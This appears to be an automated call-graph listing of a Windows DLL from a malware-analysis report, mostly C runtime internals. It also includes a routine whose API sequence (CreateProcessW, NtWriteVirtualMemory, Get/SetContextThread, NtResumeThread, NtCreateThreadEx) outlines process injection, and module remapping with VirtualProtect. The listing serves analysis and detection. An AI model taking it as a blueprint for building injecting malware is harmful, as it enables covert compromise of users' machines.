6ce18a4a 11066->11067 11068 6ce18a35 11066->11068 11069 6ce18a91 11066->11069 11067->11069 11071 6ce12ed3 _free 14 API calls 11067->11071 11068->11069 11070 6ce12ed3 _free 14 API calls 11068->11070 11069->11061 11070->11069 11071->11069 11073 6ce1904e __startOneArgErrorHandling 11072->11073 11074 6ce19075 __startOneArgErrorHandling 11073->11074 11083 6ce192f1 11073->11083 11076 6ce190b8 11074->11076 11077 6ce19093 11074->11077 11095 6ce195e7 11076->11095 11087 6ce19616 11077->11087 11080 6ce190b3 __startOneArgErrorHandling 11081 6ce0fa90 _ValidateLocalCookies 5 API calls 11080->11081 11082 6ce190dc 11081->11082 11082->11063 11084 6ce1931c __raise_exc 11083->11084 11085 6ce19515 RaiseException 11084->11085 11086 6ce1952e 11085->11086 11086->11074 11088 6ce19625 11087->11088 11089 6ce19699 __startOneArgErrorHandling 11088->11089 11091 6ce19644 __startOneArgErrorHandling 11088->11091 11090 6ce195e7 __startOneArgErrorHandling 14 API calls 11089->11090 11092 6ce196ae 11090->11092 11093 6ce19692 11091->11093 11094 6ce195e7 __startOneArgErrorHandling 14 API calls 11091->11094 11092->11080 11093->11080 11094->11093 11096 6ce195f4 11095->11096 11097 6ce19609 11095->11097 11098 6ce1960e 11096->11098 11100 6ce12ed3 _free 14 API calls 11096->11100 11099 6ce12ed3 _free 14 API calls 11097->11099 11098->11080 11099->11098 11101 6ce19601 11100->11101 11101->11080 11893 6ce149d1 11894 6ce149dd ___scrt_is_nonwritable_in_current_image 11893->11894 11905 6ce12bda EnterCriticalSection 11894->11905 11896 6ce149e4 11897 6ce16511 26 API calls 11896->11897 11898 6ce149f3 11897->11898 11904 6ce14a02 11898->11904 11906 6ce14867 GetStartupInfoW 11898->11906 11903 6ce1491d 2 API calls 11903->11904 11912 6ce14a28 11904->11912 11905->11896 11907 6ce14884 11906->11907 11909 6ce14918 11906->11909 11908 6ce16511 26 API calls 11907->11908 11907->11909 11910 6ce148ac 11908->11910 11909->11903 11910->11909 11911 6ce148dc GetFileType 11910->11911 11911->11910 11915 6ce12c22 LeaveCriticalSection 11912->11915 11914 6ce14a13 11915->11914 12107 6ce15950 12108 6ce1598a 12107->12108 12109 6ce12ed3 _free 14 API calls 12108->12109 12114 6ce1599e 12108->12114 12110 6ce15993 12109->12110 12112 6ce12e16 __fassign 25 API calls 12110->12112 12111 6ce0fa90 _ValidateLocalCookies 5 API calls 12113 6ce159ab 12111->12113 12112->12114 12114->12111 12115 6ce12b53 12123 6ce14613 12115->12123 12118 6ce12a9e _free 14 API calls 12119 6ce12b6f 12118->12119 12120 6ce12b7c 12119->12120 12121 6ce12b7f __DllMainCRTStartup@12 6 API calls 12119->12121 12122 6ce12b67 12121->12122 12124 6ce14531 _free 5 API calls 12123->12124 12125 6ce1462f 12124->12125 12126 6ce14647 TlsAlloc 12125->12126 12127 6ce12b5d 12125->12127 12126->12127 12127->12118 12127->12122 11102 6ce188d5 11106 6ce188fd 11102->11106 11103 6ce18935 11104 6ce18927 11111 6ce189a7 11104->11111 11105 6ce1892e 11115 6ce18990 11105->11115 11106->11103 11106->11104 11106->11105 11112 6ce189b0 11111->11112 11119 6ce18ec3 11112->11119 11116 6ce189b0 11115->11116 11117 6ce18ec3 __startOneArgErrorHandling 20 API calls 11116->11117 11118 6ce18933 11117->11118 11121 6ce18f02 __startOneArgErrorHandling 11119->11121 11120 6ce18f84 __startOneArgErrorHandling 11123 6ce195e7 __startOneArgErrorHandling 14 API calls 11120->11123 11124 6ce18fb9 11120->11124 11121->11120 11127 6ce192ce 11121->11127 11123->11124 11125 6ce0fa90 _ValidateLocalCookies 5 API calls 11124->11125 11126 6ce1892c 11125->11126 11128 6ce192f1 __raise_exc RaiseException 11127->11128 11129 6ce192ec 11128->11129 11129->11120 11735 6ce12254 11736 6ce10f96 ___scrt_uninitialize_crt 7 API calls 11735->11736 11737 6ce1225b 11736->11737 11130 6ce100d7 11131 6ce100df ___scrt_release_startup_lock 11130->11131 11134 6ce1174f 11131->11134 11133 6ce10107 11135 6ce11762 11134->11135 11136 6ce1175e 11134->11136 11139 6ce1176f 11135->11139 11136->11133 11140 6ce12a9e _free 14 API calls 11139->11140 11141 6ce1176b 11140->11141 11141->11133 11916 6ce18bd7 11917 6ce18bf0 __startOneArgErrorHandling 11916->11917 11918 6ce19015 20 API calls 11917->11918 11919 6ce18c19 __startOneArgErrorHandling 11917->11919 11918->11919 11738 6ce1225d 11741 6ce122e3 11738->11741 11742 6ce122f7 11741->11742 11744 6ce12270 11741->11744 11743 6ce12f43 _free 14 API calls 11742->11743 11742->11744 11743->11744 11014 6ce0fdde 11015 6ce0fde7 11014->11015 11016 6ce0fdec 11014->11016 11035 6ce0ff70 11015->11035 11020 6ce0fca8 11016->11020 11022 6ce0fcb4 ___scrt_is_nonwritable_in_current_image 11020->11022 11021 6ce0fcc3 11022->11021 11023 6ce0fcdd dllmain_raw 11022->11023 11025 6ce0fcd8 11022->11025 11023->11021 11024 6ce0fcf7 dllmain_crt_dispatch 11023->11024 11024->11021 11024->11025 11026 6ce0e6b0 __DllMainCRTStartup@12 5 API calls 11025->11026 11027 6ce0fd18 11026->11027 11028 6ce0fd49 11027->11028 11030 6ce0e6b0 __DllMainCRTStartup@12 5 API calls 11027->11030 11028->11021 11029 6ce0fd52 dllmain_crt_dispatch 11028->11029 11029->11021 11031 6ce0fd65 dllmain_raw 11029->11031 11032 6ce0fd30 11030->11032 11031->11021 11033 6ce0fbf8 __DllMainCRTStartup@12 84 API calls 11032->11033 11034 6ce0fd3e dllmain_raw 11033->11034 11034->11028 11036 6ce0ff86 11035->11036 11038 6ce0ff8f 11036->11038 11039 6ce0ff23 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11036->11039 11038->11016 11039->11038 11745 6ce1485e GetStartupInfoW 11746 6ce14884 11745->11746 11747 6ce14918 11745->11747 11746->11747 11751 6ce16511 11746->11751 11749 6ce148dc GetFileType 11750 6ce148ac 11749->11750 11750->11747 11750->11749 11752 6ce1651d ___scrt_is_nonwritable_in_current_image 11751->11752 11753 6ce16547 11752->11753 11754 6ce16526 11752->11754 11764 6ce12bda EnterCriticalSection 11753->11764 11755 6ce12ed3 _free 14 API calls 11754->11755 11757 6ce1652b 11755->11757 11758 6ce12e16 __fassign 25 API calls 11757->11758 11759 6ce16535 11758->11759 11759->11750 11760 6ce1657f 11772 6ce165a6 11760->11772 11762 6ce16553 11762->11760 11765 6ce16461 11762->11765 11764->11762 11766 6ce12ee6 _free 14 API calls 11765->11766 11768 6ce16473 11766->11768 11767 6ce16480 11769 6ce12f43 _free 14 API calls 11767->11769 11768->11767 11770 6ce14712 6 API calls 11768->11770 11771 6ce164d5 11769->11771 11770->11768 11771->11762 11775 6ce12c22 LeaveCriticalSection 11772->11775 11774 6ce165ad 11774->11759 11775->11774 11920 6ce123a4 11921 6ce123a7 11920->11921 11922 6ce12429 __fassign 37 API calls 11921->11922 11923 6ce123b3 11922->11923 11924 6ce141a8 GetCommandLineA GetCommandLineW 11776 6ce1342d 11777 6ce1343e 11776->11777 11778 6ce0fa90 _ValidateLocalCookies 5 API calls 11777->11778 11779 6ce13628 11778->11779 10159 6ce078b0 10185 6ce0790f __DllMainCRTStartup@12 10159->10185 10160 6ce0d3a2 CreateProcessW 10160->10185 10161 6ce0a444 NtWriteVirtualMemory 10161->10185 10162 6ce09c59 CreateProcessW 10162->10185 10163 6ce0decb NtGetContextThread 10163->10185 10164 6ce0d212 10246 6ce0fa90 10164->10246 10166 6ce0d21c 10167 6ce0e28f NtWriteVirtualMemory 10167->10185 10168 6ce0e621 NtCreateThreadEx 10168->10185 10171 6ce0a3aa NtAllocateVirtualMemory 10171->10185 10172 6ce0bed2 NtReadVirtualMemory 10172->10185 10173 6ce0dabf NtReadVirtualMemory 10173->10185 10174 6ce0d63c NtWriteVirtualMemory 10174->10185 10175 6ce0c7dd NtWriteVirtualMemory 10175->10185 10176 6ce0cd7b NtCreateThreadEx 10176->10185 10177 6ce0a7f8 NtWriteVirtualMemory 10177->10185 10178 6ce0e4eb NtWriteVirtualMemory 10178->10185 10179 6ce0e029 NtWriteVirtualMemory 10180 6ce074f0 5 API calls 10179->10180 10201 6ce0d251 10180->10201 10181 6ce06bd0 7 API calls 10182 6ce0df1f NtAllocateVirtualMemory 10181->10182 10182->10185 10183 6ce09441 GetConsoleWindow ShowWindow 10206 6ce017f0 10183->10206 10185->10160 10185->10161 10185->10162 10185->10163 10185->10164 10185->10167 10185->10168 10185->10171 10185->10172 10185->10173 10185->10174 10185->10175 10185->10176 10185->10177 10185->10178 10185->10179 10185->10183 10186 6ce017f0 24 API calls 10185->10186 10188 6ce0cfd2 NtSetContextThread NtResumeThread 10185->10188 10189 6ce0dcff NtCreateThreadEx 10185->10189 10190 6ce0aea2 NtWriteVirtualMemory 10185->10190 10192 6ce0d0bf CloseHandle CloseHandle 10185->10192 10193 6ce0e1eb NtReadVirtualMemory 10185->10193 10194 6ce098d1 VirtualAlloc 10185->10194 10195 6ce0db42 NtWriteVirtualMemory 10185->10195 10196 6ce0c1da NtWriteVirtualMemory 10185->10196 10197 6ce0de3c CreateProcessW 10185->10197 10198 6ce0a013 NtGetContextThread 10185->10198 10199 6ce0d224 GetConsoleWindow ShowWindow 10185->10199 10185->10201 10204 6ce0e45d CloseHandle CloseHandle 10185->10204 10205 6ce0e3c9 NtCreateThreadEx 10185->10205 10230 6ce06bd0 10185->10230 10242 6ce01010 10185->10242 10186->10185 10188->10185 10189->10185 10238 6ce074f0 10190->10238 10192->10185 10193->10185 10194->10185 10195->10185 10196->10185 10197->10185 10198->10185 10200 6ce017f0 24 API calls 10199->10200 10200->10201 10201->10181 10201->10185 10202 6ce017f0 24 API calls 10201->10202 10203 6ce01010 5 API calls 10201->10203 10202->10201 10203->10201 10204->10185 10205->10185 10208 6ce0184f ___scrt_uninitialize_crt __DllMainCRTStartup@12 10206->10208 10207 6ce035c2 MapViewOfFile 10207->10208 10208->10207 10209 6ce042fd 10208->10209 10212 6ce04654 K32GetModuleInformation 10208->10212 10213 6ce03bf1 VirtualProtect 10208->10213 10214 6ce03d17 VirtualProtect 10208->10214 10215 6ce046a4 CreateFileA 10208->10215 10216 6ce02f9c CreateFileMappingA 10208->10216 10217 6ce047c6 VirtualProtect 10208->10217 10219 6ce02b1c GetModuleFileNameA 10208->10219 10220 6ce04725 CreateFileMappingA 10208->10220 10221 6ce042da CloseHandle 10208->10221 10222 6ce04617 GetModuleHandleA 10208->10222 10223 6ce0431d GetModuleHandleA 10208->10223 10224 6ce0279e GetModuleHandleA 10208->10224 10225 6ce02672 GetCurrentProcess 10208->10225 10226 6ce042a8 CloseHandle CloseHandle 10208->10226 10227 6ce034fb CloseHandle 10208->10227 10228 6ce02a83 K32GetModuleInformation 10208->10228 10229 6ce02bc8 CreateFileA 10208->10229 10210 6ce0fa90 _ValidateLocalCookies 5 API calls 10209->10210 10211 6ce04307 10210->10211 10211->10185 10212->10208 10213->10208 10214->10208 10215->10208 10216->10208 10218 6ce04873 ___scrt_uninitialize_crt 10217->10218 10218->10208 10219->10208 10220->10208 10221->10208 10222->10208 10223->10208 10224->10208 10225->10208 10226->10208 10227->10208 10228->10208 10229->10208 10232 6ce06bf0 10230->10232 10231 6ce06f45 NtQueryInformationProcess 10231->10232 10232->10231 10233 6ce072a1 10232->10233 10236 6ce06e45 GetModuleHandleW 10232->10236 10234 6ce0fa90 _ValidateLocalCookies 5 API calls 10233->10234 10235 6ce072b1 NtAllocateVirtualMemory 10234->10235 10235->10185 10237 6ce06e90 __DllMainCRTStartup@12 10236->10237 10237->10232 10239 6ce0754e 10238->10239 10240 6ce0fa90 _ValidateLocalCookies 5 API calls 10239->10240 10241 6ce07868 10240->10241 10241->10185 10245 6ce0106f 10242->10245 10243 6ce0fa90 _ValidateLocalCookies 5 API calls 10244 6ce016e9 10243->10244 10244->10185 10245->10243 10247 6ce0fa98 10246->10247 10248 6ce0fa99 IsProcessorFeaturePresent 10246->10248 10247->10166 10250 6ce0fe3e 10248->10250 10253 6ce0fe01 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10250->10253 10252 6ce0ff21 10252->10166 10253->10252 11780 6ce14a31 11781 6ce14a36 11780->11781 11783 6ce14a59 11781->11783 11784 6ce164dc 11781->11784 11785 6ce164e9 11784->11785 11786 6ce1650b 11784->11786 11787 6ce16505 11785->11787 11788 6ce164f7 DeleteCriticalSection 11785->11788 11786->11781 11789 6ce12f43 _free 14 API calls 11787->11789 11788->11787 11788->11788 11789->11786 12128 6ce1633a 12129 6ce13e6a 47 API calls 12128->12129 12130 6ce1633f 12129->12130 10254 6ce15180 10255 6ce1518d 10254->10255 10266 6ce12ee6 10255->10266 10259 6ce151b3 10260 6ce12ee6 _free 14 API calls 10259->10260 10263 6ce151d9 10259->10263 10262 6ce151cd 10260->10262 10264 6ce12f43 _free 14 API calls 10262->10264 10265 6ce151e5 10263->10265 10279 6ce14712 10263->10279 10264->10263 10271 6ce12ef3 _free 10266->10271 10267 6ce12f33 10287 6ce12ed3 10267->10287 10268 6ce12f1e RtlAllocateHeap 10269 6ce12f31 10268->10269 10268->10271 10273 6ce12f43 10269->10273 10271->10267 10271->10268 10284 6ce14b05 10271->10284 10274 6ce12f4e HeapFree 10273->10274 10278 6ce12f77 _free 10273->10278 10275 6ce12f63 10274->10275 10274->10278 10276 6ce12ed3 _free 12 API calls 10275->10276 10277 6ce12f69 GetLastError 10276->10277 10277->10278 10278->10259 10280 6ce14531 _free 5 API calls 10279->10280 10281 6ce1472e 10280->10281 10282 6ce1474c InitializeCriticalSectionAndSpinCount 10281->10282 10283 6ce14737 10281->10283 10282->10283 10283->10263 10290 6ce14b32 10284->10290 10301 6ce12a9e GetLastError 10287->10301 10289 6ce12ed8 10289->10269 10291 6ce14b3e ___scrt_is_nonwritable_in_current_image 10290->10291 10296 6ce12bda EnterCriticalSection 10291->10296 10293 6ce14b49 10297 6ce14b85 10293->10297 10296->10293 10300 6ce12c22 LeaveCriticalSection 10297->10300 10299 6ce14b10 10299->10271 10300->10299 10302 6ce12abb 10301->10302 10303 6ce12ab5 10301->10303 10323 6ce12ac1 SetLastError 10302->10323 10329 6ce146d0 10302->10329 10324 6ce14691 10303->10324 10307 6ce12ee6 _free 12 API calls 10308 6ce12ae9 10307->10308 10310 6ce12af1 10308->10310 10311 6ce12b08 10308->10311 10312 6ce146d0 _free 6 API calls 10310->10312 10313 6ce146d0 _free 6 API calls 10311->10313 10314 6ce12aff 10312->10314 10315 6ce12b14 10313->10315 10320 6ce12f43 _free 12 API calls 10314->10320 10316 6ce12b29 10315->10316 10317 6ce12b18 10315->10317 10334 6ce12749 10316->10334 10318 6ce146d0 _free 6 API calls 10317->10318 10318->10314 10320->10323 10322 6ce12f43 _free 12 API calls 10322->10323 10323->10289 10339 6ce14531 10324->10339 10326 6ce146ad 10327 6ce146b6 10326->10327 10328 6ce146c8 TlsGetValue 10326->10328 10327->10302 10330 6ce14531 _free 5 API calls 10329->10330 10331 6ce146ec 10330->10331 10332 6ce1470a TlsSetValue 10331->10332 10333 6ce12ad9 10331->10333 10333->10307 10333->10323 10352 6ce125dd 10334->10352 10340 6ce1455f 10339->10340 10344 6ce1455b _free 10339->10344 10340->10344 10345 6ce1446a 10340->10345 10343 6ce14579 GetProcAddress 10343->10344 10344->10326 10349 6ce1447b ___vcrt_InitializeCriticalSectionEx 10345->10349 10346 6ce14499 LoadLibraryExW 10347 6ce144b4 GetLastError 10346->10347 10346->10349 10347->10349 10348 6ce1450f FreeLibrary 10348->10349 10349->10346 10349->10348 10350 6ce14526 10349->10350 10351 6ce144e7 LoadLibraryExW 10349->10351 10350->10343 10350->10344 10351->10349 10353 6ce125e9 ___scrt_is_nonwritable_in_current_image 10352->10353 10366 6ce12bda EnterCriticalSection 10353->10366 10355 6ce125f3 10367 6ce12623 10355->10367 10358 6ce126ef 10359 6ce126fb ___scrt_is_nonwritable_in_current_image 10358->10359 10371 6ce12bda EnterCriticalSection 10359->10371 10361 6ce12705 10372 6ce128d0 10361->10372 10363 6ce1271d 10376 6ce1273d 10363->10376 10366->10355 10370 6ce12c22 LeaveCriticalSection 10367->10370 10369 6ce12611 10369->10358 10370->10369 10371->10361 10373 6ce12906 __fassign 10372->10373 10374 6ce128df __fassign 10372->10374 10373->10363 10374->10373 10379 6ce15628 10374->10379 10493 6ce12c22 LeaveCriticalSection 10376->10493 10378 6ce1272b 10378->10322 10381 6ce156a8 10379->10381 10382 6ce1563e 10379->10382 10383 6ce12f43 _free 14 API calls 10381->10383 10405 6ce156f6 10381->10405 10382->10381 10385 6ce15671 10382->10385 10389 6ce12f43 _free 14 API calls 10382->10389 10384 6ce156ca 10383->10384 10386 6ce12f43 _free 14 API calls 10384->10386 10390 6ce12f43 _free 14 API calls 10385->10390 10404 6ce15693 10385->10404 10387 6ce156dd 10386->10387 10391 6ce12f43 _free 14 API calls 10387->10391 10388 6ce12f43 _free 14 API calls 10392 6ce1569d 10388->10392 10394 6ce15666 10389->10394 10395 6ce15688 10390->10395 10396 6ce156eb 10391->10396 10397 6ce12f43 _free 14 API calls 10392->10397 10393 6ce15764 10398 6ce12f43 _free 14 API calls 10393->10398 10407 6ce17557 10394->10407 10435 6ce17655 10395->10435 10401 6ce12f43 _free 14 API calls 10396->10401 10397->10381 10402 6ce1576a 10398->10402 10401->10405 10402->10373 10403 6ce15704 10403->10393 10406 6ce12f43 14 API calls _free 10403->10406 10404->10388 10447 6ce15799 10405->10447 10406->10403 10408 6ce17568 10407->10408 10434 6ce17651 10407->10434 10409 6ce17579 10408->10409 10410 6ce12f43 _free 14 API calls 10408->10410 10411 6ce1758b 10409->10411 10413 6ce12f43 _free 14 API calls 10409->10413 10410->10409 10412 6ce1759d 10411->10412 10414 6ce12f43 _free 14 API calls 10411->10414 10415 6ce175af 10412->10415 10416 6ce12f43 _free 14 API calls 10412->10416 10413->10411 10414->10412 10417 6ce175c1 10415->10417 10418 6ce12f43 _free 14 API calls 10415->10418 10416->10415 10419 6ce175d3 10417->10419 10421 6ce12f43 _free 14 API calls 10417->10421 10418->10417 10420 6ce175e5 10419->10420 10422 6ce12f43 _free 14 API calls 10419->10422 10423 6ce175f7 10420->10423 10424 6ce12f43 _free 14 API calls 10420->10424 10421->10419 10422->10420 10425 6ce17609 10423->10425 10426 6ce12f43 _free 14 API calls 10423->10426 10424->10423 10427 6ce1761b 10425->10427 10429 6ce12f43 _free 14 API calls 10425->10429 10426->10425 10428 6ce1762d 10427->10428 10430 6ce12f43 _free 14 API calls 10427->10430 10431 6ce12f43 _free 14 API calls 10428->10431 10432 6ce1763f 10428->10432 10429->10427 10430->10428 10431->10432 10433 6ce12f43 _free 14 API calls 10432->10433 10432->10434 10433->10434 10434->10385 10437 6ce17662 10435->10437 10446 6ce176ba 10435->10446 10436 6ce17672 10439 6ce17684 10436->10439 10441 6ce12f43 _free 14 API calls 10436->10441 10437->10436 10438 6ce12f43 _free 14 API calls 10437->10438 10438->10436 10440 6ce17696 10439->10440 10442 6ce12f43 _free 14 API calls 10439->10442 10443 6ce176a8 10440->10443 10444 6ce12f43 _free 14 API calls 10440->10444 10441->10439 10442->10440 10445 6ce12f43 _free 14 API calls 10443->10445 10443->10446 10444->10443 10445->10446 10446->10404 10448 6ce157a6 10447->10448 10452 6ce157c5 10447->10452 10448->10452 10453 6ce176f6 10448->10453 10451 6ce12f43 _free 14 API calls 10451->10452 10452->10403 10454 6ce157bf 10453->10454 10455 6ce17707 10453->10455 10454->10451 10489 6ce176be 10455->10489 10458 6ce176be __fassign 14 API calls 10459 6ce1771a 10458->10459 10460 6ce176be __fassign 14 API calls 10459->10460 10461 6ce17725 10460->10461 10462 6ce176be __fassign 14 API calls 10461->10462 10463 6ce17730 10462->10463 10464 6ce176be __fassign 14 API calls 10463->10464 10465 6ce1773e 10464->10465 10466 6ce12f43 _free 14 API calls 10465->10466 10467 6ce17749 10466->10467 10468 6ce12f43 _free 14 API calls 10467->10468 10469 6ce17754 10468->10469 10470 6ce12f43 _free 14 API calls 10469->10470 10471 6ce1775f 10470->10471 10472 6ce176be __fassign 14 API calls 10471->10472 10473 6ce1776d 10472->10473 10474 6ce176be __fassign 14 API calls 10473->10474 10475 6ce1777b 10474->10475 10476 6ce176be __fassign 14 API calls 10475->10476 10477 6ce1778c 10476->10477 10478 6ce176be __fassign 14 API calls 10477->10478 10479 6ce1779a 10478->10479 10480 6ce176be __fassign 14 API calls 10479->10480 10481 6ce177a8 10480->10481 10482 6ce12f43 _free 14 API calls 10481->10482 10483 6ce177b3 10482->10483 10484 6ce12f43 _free 14 API calls 10483->10484 10485 6ce177be 10484->10485 10486 6ce12f43 _free 14 API calls 10485->10486 10487 6ce177c9 10486->10487 10488 6ce12f43 _free 14 API calls 10487->10488 10488->10454 10490 6ce176f1 10489->10490 10491 6ce176e1 10489->10491 10490->10458 10491->10490 10492 6ce12f43 _free 14 API calls 10491->10492 10492->10491 10493->10378 12131 6ce18100 12134 6ce1811e 12131->12134 12133 6ce18116 12138 6ce18123 12134->12138 12135 6ce189e3 15 API calls 12136 6ce1834f 12135->12136 12136->12133 12137 6ce181b8 12137->12133 12138->12135 12138->12137 11790 6ce17c0f 11791 6ce17c18 11790->11791 11792 6ce17cbe 11791->11792 11794 6ce17c3f 11791->11794 11795 6ce189a7 20 API calls 11792->11795 11793 6ce188d0 11794->11793 11797 6ce189a7 20 API calls 11794->11797 11796 6ce17cce 11795->11796 11798 6ce188ce 11797->11798 11925 6ce1338e 11932 6ce1371d 11925->11932 11928 6ce12f43 _free 14 API calls 11929 6ce133a8 11928->11929 11930 6ce12f43 _free 14 API calls 11929->11930 11931 6ce1334a 11930->11931 11933 6ce1372f 11932->11933 11936 6ce13399 11932->11936 11934 6ce13734 11933->11934 11937 6ce1375a 11933->11937 11935 6ce12ee6 _free 14 API calls 11934->11935 11939 6ce1373d 11935->11939 11936->11928 11936->11929 11937->11936 11943 6ce143af 11937->11943 11941 6ce12f43 _free 14 API calls 11939->11941 11940 6ce1377a 11942 6ce12f43 _free 14 API calls 11940->11942 11941->11936 11942->11936 11944 6ce143d7 11943->11944 11945 6ce143bc 11943->11945 11946 6ce143e6 11944->11946 11952 6ce16349 11944->11952 11945->11944 11947 6ce143c8 11945->11947 11959 6ce1637c 11946->11959 11949 6ce12ed3 _free 14 API calls 11947->11949 11951 6ce143cd __DllMainCRTStartup@12 11949->11951 11951->11940 11953 6ce16354 11952->11953 11954 6ce16369 HeapSize 11952->11954 11955 6ce12ed3 _free 14 API calls 11953->11955 11954->11946 11956 6ce16359 11955->11956 11957 6ce12e16 __fassign 25 API calls 11956->11957 11958 6ce16364 11957->11958 11958->11946 11960 6ce16394 11959->11960 11961 6ce16389 11959->11961 11963 6ce1639c 11960->11963 11970 6ce163a5 _free 11960->11970 11962 6ce152bc 15 API calls 11961->11962 11968 6ce16391 11962->11968 11964 6ce12f43 _free 14 API calls 11963->11964 11964->11968 11965 6ce163aa 11967 6ce12ed3 _free 14 API calls 11965->11967 11966 6ce163cf HeapReAlloc 11966->11968 11966->11970 11967->11968 11968->11951 11969 6ce14b05 _free 2 API calls 11969->11970 11970->11965 11970->11966 11970->11969 11803 6ce11015 11806 6ce11063 11803->11806 11807 6ce11020 11806->11807 11808 6ce1106c 11806->11808 11808->11807 11815 6ce112a9 11808->11815 11810 6ce110a7 11811 6ce112a9 47 API calls 11810->11811 11812 6ce110b2 11811->11812 11828 6ce12378 11812->11828 11816 6ce112b7 23 API calls 11815->11816 11817 6ce112ae 11816->11817 11817->11810 11818 6ce14c5c __fassign 2 API calls 11817->11818 11819 6ce1242e 11818->11819 11820 6ce14ca1 __fassign 37 API calls 11819->11820 11825 6ce12439 11819->11825 11820->11825 11821 6ce12443 IsProcessorFeaturePresent 11823 6ce1244f 11821->11823 11822 6ce12462 11824 6ce11b5b __fassign 23 API calls 11822->11824 11826 6ce12c6a __fassign 8 API calls 11823->11826 11827 6ce1246c 11824->11827 11825->11821 11825->11822 11826->11822 11829 6ce12384 ___scrt_is_nonwritable_in_current_image 11828->11829 11830 6ce12947 __fassign 37 API calls 11829->11830 11833 6ce12389 11830->11833 11831 6ce12429 __fassign 37 API calls 11832 6ce123b3 11831->11832 11833->11831 11834 6ce14816 11835 6ce14821 11834->11835 11837 6ce14847 11834->11837 11836 6ce14831 FreeLibrary 11835->11836 11835->11837 11836->11835 12143 6ce13116 12146 6ce12f95 12143->12146 12147 6ce12fa3 12146->12147 12148 6ce12fbd 12146->12148 12149 6ce13669 14 API calls 12147->12149 12150 6ce12fe3 12148->12150 12151 6ce12fc4 12148->12151 12155 6ce12fad 12149->12155 12152 6ce141c1 __fassign MultiByteToWideChar 12150->12152 12151->12155 12164 6ce136bf 12151->12164 12154 6ce12ff2 12152->12154 12156 6ce12ff9 GetLastError 12154->12156 12158 6ce1301f 12154->12158 12160 6ce136bf 15 API calls 12154->12160 12157 6ce12e9d __dosmaperr 14 API calls 12156->12157 12159 6ce13005 12157->12159 12158->12155 12161 6ce141c1 __fassign MultiByteToWideChar 12158->12161 12162 6ce12ed3 _free 14 API calls 12159->12162 12160->12158 12163 6ce13036 12161->12163 12162->12155 12163->12155 12163->12156 12165 6ce13669 14 API calls 12164->12165 12166 6ce136cd 12165->12166 12167 6ce136fe 15 API calls 12166->12167 12168 6ce136de 12167->12168 12168->12155 11971 6ce12b99 11972 6ce12ba4 11971->11972 11973 6ce14712 6 API calls 11972->11973 11974 6ce12bcd 11972->11974 11975 6ce12bc9 11972->11975 11973->11972 11977 6ce12bf1 11974->11977 11978 6ce12c1d 11977->11978 11979 6ce12bfe 11977->11979 11978->11975 11980 6ce12c08 DeleteCriticalSection 11979->11980 11980->11978 11980->11980 10494 6ce0fa9e 10495 6ce0faa9 10494->10495 10496 6ce0fadc 10494->10496 10498 6ce0face 10495->10498 10499 6ce0faae 10495->10499 10533 6ce0fbf8 10496->10533 10506 6ce0faf1 10498->10506 10501 6ce0fab3 10499->10501 10502 6ce0fac4 10499->10502 10505 6ce0fab8 10501->10505 10520 6ce100ca 10501->10520 10525 6ce100ab 10502->10525 10507 6ce0fafd ___scrt_is_nonwritable_in_current_image 10506->10507 10560 6ce1013b 10507->10560 10509 6ce0fb04 __DllMainCRTStartup@12 10510 6ce0fbf0 10509->10510 10511 6ce0fb2b 10509->10511 10517 6ce0fb67 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10509->10517 10579 6ce102da IsProcessorFeaturePresent 10510->10579 10571 6ce1009d 10511->10571 10514 6ce0fbf7 10515 6ce0fb3a __RTC_Initialize 10515->10517 10574 6ce0ffbb InitializeSListHead 10515->10574 10517->10505 10518 6ce0fb48 10518->10517 10575 6ce10072 10518->10575 10673 6ce1232e 10520->10673 10765 6ce10f80 10525->10765 10530 6ce100c7 10530->10505 10531 6ce10f8b 21 API calls 10532 6ce100b4 10531->10532 10532->10505 10535 6ce0fc04 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10533->10535 10534 6ce0fc0d 10534->10505 10535->10534 10536 6ce0fca0 10535->10536 10537 6ce0fc35 10535->10537 10538 6ce102da __DllMainCRTStartup@12 4 API calls 10536->10538 10785 6ce1010b 10537->10785 10542 6ce0fca7 ___scrt_is_nonwritable_in_current_image 10538->10542 10540 6ce0fc3a 10794 6ce0ffc7 10540->10794 10543 6ce0fcc3 10542->10543 10544 6ce0fcdd dllmain_raw 10542->10544 10546 6ce0fcd8 10542->10546 10543->10505 10544->10543 10547 6ce0fcf7 dllmain_crt_dispatch 10544->10547 10545 6ce0fc3f __RTC_Initialize __DllMainCRTStartup@12 10797 6ce102ac 10545->10797 10806 6ce0e6b0 10546->10806 10547->10543 10547->10546 10553 6ce0fd52 dllmain_crt_dispatch 10553->10543 10556 6ce0fd65 dllmain_raw 10553->10556 10554 6ce0fd49 10554->10543 10554->10553 10555 6ce0e6b0 __DllMainCRTStartup@12 5 API calls 10557 6ce0fd30 10555->10557 10556->10543 10558 6ce0fbf8 __DllMainCRTStartup@12 79 API calls 10557->10558 10559 6ce0fd3e dllmain_raw 10558->10559 10559->10554 10561 6ce10144 10560->10561 10583 6ce104a8 IsProcessorFeaturePresent 10561->10583 10565 6ce10159 10565->10509 10566 6ce10155 10566->10565 10593 6ce12311 10566->10593 10569 6ce10170 10569->10509 10667 6ce10174 10571->10667 10573 6ce100a4 10573->10515 10574->10518 10576 6ce10077 ___scrt_release_startup_lock 10575->10576 10577 6ce104a8 IsProcessorFeaturePresent 10576->10577 10578 6ce10080 10576->10578 10577->10578 10578->10517 10580 6ce102f0 __DllMainCRTStartup@12 10579->10580 10581 6ce1039b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10580->10581 10582 6ce103e6 __DllMainCRTStartup@12 10581->10582 10582->10514 10584 6ce10150 10583->10584 10585 6ce10f61 10584->10585 10602 6ce11397 10585->10602 10589 6ce10f72 10590 6ce10f7d 10589->10590 10616 6ce113d3 10589->10616 10590->10566 10592 6ce10f6a 10592->10566 10658 6ce14a5d 10593->10658 10596 6ce10f96 10597 6ce10fa9 10596->10597 10598 6ce10f9f 10596->10598 10597->10565 10599 6ce1137c ___vcrt_uninitialize_ptd 6 API calls 10598->10599 10600 6ce10fa4 10599->10600 10601 6ce113d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10600->10601 10601->10597 10603 6ce113a0 10602->10603 10605 6ce113c9 10603->10605 10607 6ce10f66 10603->10607 10620 6ce11605 10603->10620 10606 6ce113d3 ___vcrt_uninitialize_locks DeleteCriticalSection 10605->10606 10606->10607 10607->10592 10608 6ce11349 10607->10608 10639 